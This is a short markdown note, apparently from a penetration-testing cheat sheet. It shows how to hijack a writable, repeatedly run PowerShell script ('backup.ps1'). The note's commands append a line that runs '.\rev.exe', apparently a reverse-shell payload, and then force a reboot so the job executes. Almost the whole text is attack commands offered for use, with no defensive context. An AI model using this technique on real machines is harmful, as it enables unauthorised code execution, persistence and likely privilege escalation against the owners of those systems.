# Job with editable file

This topic created for uncommon editable files with repetetive job.

### Powershell file

```
echo. >> backup.ps1
echo .\rev.exe >> backup.ps1
```

To get restart machine, you can use this command:

```
powershell Restart-Computer
```
